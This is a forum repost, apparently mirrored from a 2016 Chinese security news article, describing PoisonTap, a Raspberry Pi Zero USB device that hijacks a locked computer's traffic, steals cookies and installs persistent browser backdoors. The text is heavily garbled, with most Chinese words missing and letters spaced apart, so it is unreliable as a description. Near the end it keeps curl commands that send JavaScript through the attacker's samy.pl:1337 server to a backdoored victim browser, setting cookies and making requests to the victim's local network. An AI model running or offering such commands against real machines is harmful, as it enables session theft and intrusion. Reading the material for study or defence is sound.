搜索

[10739] 2016-11-21_30秒攻破任意密码保护的PC:深入了解5美元黑客神器PoisonTap

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-18
2016-11-21_30秒攻破任意密码保护的PC:深入了解5美元黑客神器PoisonTap 3 0 P C 5 P o i s o n T a p c l o u d s   F r e e B u f   2 0 1 6 - 1 1 - 2 1 S a m y   K a m k a r 5 P o i s o n T a p 3 0 P o i s o n T a p P o i s o n T a p 5 R a s p b e r r y   P i   Z e r o U S B G i t h u b R a s p b e r r y   P i   Z e r o P o i s o n T a p P o i s o n T a p G i t h u b S a m y   K a m k a r P o i s o n T a p P o i s o n T a p W i n d o w s M a c 使 使 W I F I 使 P o i s o n T a p c o o k i e s e s s i o n P o i s o n T a p   U S B T h u n d e r b o l t 使 A l e x a 1 0 0 c o o k i e s e s s i o n o u t b o u n d W e b S o c k e t D N S H T T P J S w e b j a v a s c r i p t   C D N   使 c o o k i e H T T P   G E T P O S T
  P o i s o n T a p C o o k i e H t t p O n l y C o o k i e S a m e S i t e D N S   P i n n i n g     H T T P S   c o o k i e   P o i s o n T a p P o i s o n T a p U S B / T h u n d e r b o l t D H C P D N S H T T P
1   P o i s o n T a p 2   P o i s o n T a p 使 W i n d o w s O S   X   L i n u x D H C P 3   P o i s o n T a p D H C P 0 . 0 . 0 . 0 2 5 5 . 2 5 5 . 2 5 5 . 2 5 5 P o i s o n T a p I P   使 使 I n t e r n e t   t r a f f i c   L A N t r a f f i c / / P o i s o n T a p
C o o k i e A J A X s c r i p t / i f r a m e s 1   P o i s o n T a p H T T P P o i s o n T a p w e b N o d e . j s 使 D N S I P D N S I P I P P o i s o n T a p 3   N o d e   w e b P o i s o n T a p H T M L J a v a s c r i p t H T M L J S 4   H T M L   /   J S - a g n o s t i c i f r a m e i f r a m e A l e x a 1 0 0 w e b 访 访
1 P o i s o n T a p i f r a m e 使 i f r a m e i f r a m e H T M L   +   J a v a s c r i p t 2   使 P o i s o n T a p 使 使 C o o k i e h t t p : / / n f l . c o m / P o i s o n T a p i f r a m e P o i s o n T a p I n t e r n e t N o d e   W e b H T T P H T T P 3   H T M L J a v a s c r i p t W e b S o c k e t w e b P o i s o n T a p W e b S o c k e t A l e x a 1 0 0 - n f l . c o m p i n t e r e s t . c o m n f l . c o m i f r a m e p i n t e r e s t . c o m h t t p : / / p i n t e r e s t . c o m / P o i s o n T a p X - F r a m e - O p t i o n s P o i s o n T a p 访 访 1   P o i s o n T a p 2   P o i s o n T a p I P . i p . s a m y . p l 1 9 2 . 1 6 8 . 0 . 1 . i p . s a m y . p l D N S 使 P o i s o n T a p D N S 使 D N S P o i s o n T a p 使 I P 1 . 0 . 0 . 1 访 P o i s o n T a p   W e b D N S 1 9 2 . 1 6 8 . 0 . x 1 . 0 . 0 . 1 . p i n . i p . s a m y . p l D N S [ i p . a d d r e s s ] . i p . s a m y . p l I P P o i s o n T a p h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 . i p . s a m y . p l / P o i s o n T a p P o i s o n T a p 1 . 0 . 0 . 1 P o i s o n T a p 访 3   D N S p i n n i n g   D N S r e b i n d i n g A l e x a   t o p 1 0 0 D N S   p i n n i n g D N S 使 4   h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 . i p . s a m y . p l / P o i s o n T a p 1 9 2 . 1 6 8 . 0 . 1 . i p . s a m y . p l 访 u n p i n n e d I P 1 9 2 . 1 6 8 . 0 . 1 5   i f r a m e 1 9 2 . 1 6 8 . 0 . 1 . i p . s a m y . p l / P o i s o n T a p A J A X   G E T / P O S T
D N S w e b 访 访 1   P o i s o n T a p C D N J a v a s c r i p t G o o g l e j Q u e r y   C D N s C D N   J a v a s c r i p t 访 2   使 访 , A J A X   G E T   /   P O S T 3   访 H T T P C D N   J a v a s c r i p t [ i p . a d d y ] . i p . s a m y . p l   n o r m a l l y   r e s p o n d s   w i t h   [ i p . a d d y ] 1 9 2 . 1 6 8 . 0 . 1 . i p . s a m y . p l   - >   1 9 2 . 1 6 8 . 0 . 1   ( A   r e c o r d ) [ i p . a d d y ] . p i n . i p . s a m y . p l   t e m p o r a r i l y   ( ~ 5   s e c o n d s )   p o i n t s   * . i p . s a m y . p l   t o   [ i p . a d d y ]
P o s i o n T a p 1   使 H T T P S 使 H T T P S 2 C o o k i e H T T P S   C o o k i e 3   J a v a s c r i p t 使 ( S R I ) 4   使 H S T S H T T P S 1   U S B T h u n d e r b o l t 2   3   U S B T h u n d e r b o l t 4   5   使 b a c k d o o r . h t m l h t t p : / / h o s t n a m e / P o i s o n T a p U R L   c o o k i e s a m y . p l : 1 3 3 7 / w e b s o c k e t b a c k e n d _ s e r v e r . j s I n t e r n e t 访 N o d e , b a c k d o o r . h t m l s a m y . p l : 1 3 3 7  
p i _ p o i s o n t a p . j s R a s p b e r r y   P i   Z e r o N o d e . j s P o i s o n T a p   H T T P C o o k i e p i _ s t a r t u p . s h R a s p b e r r y   P i   Z e r o U S B D H C P D N S p i _ p o i s o n t a p . j s t a r g e t _ b a c k d o o r . j s   C D N J a v a s c r i p t G o o g l e   C D N s   j Q u e r y   U R L t a r g e t _ i n j e c t e d _ x h t m l j s . h t m l H T T P   /   A J A X p o i s o n t a p . c o o k i e s . l o g   c o o k i e   P o i s o n T a p K a m k a r P o i s o n T a p * g i t h u b F B c l o u d s F r e e B u f F r e e B u f . C O M #   p o p   a l e r t   t o   v i c t i m c u r l   ' h t t p : / / s a m y . p l : 1 3 3 7 / e x e c ? a l e r t ( " m u a h a h a h a h a " ) ' #   t o   s e t   a   c o o k i e   o n   v i c t i m c u r l   ' h t t p : / / s a m y . p l : 1 3 3 7 / e x e c ? d o c u m e n t . c o o k i e = " k e y = v a l u e " ' #   t o   f o r c e   v i c t i m   t o   l o a d   a   u r l   v i a   a j a x   ( n o t e ,   j Q u e r y   i s   s t o r e d   i n s i d e   t h e   b a c k d o o r ) c u r l   ' h t t p : / / s a m y . p l : 1 3 3 7 / e x e c ? $ . g e t ( " h t t p : / / 1 9 2 . 1 6 8 . 0 . 1 . i p . s a m y . p l / l o g i n " , f u n c t i o n ( d ) { c o n s o l e . l o g ( d ) } ) '
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理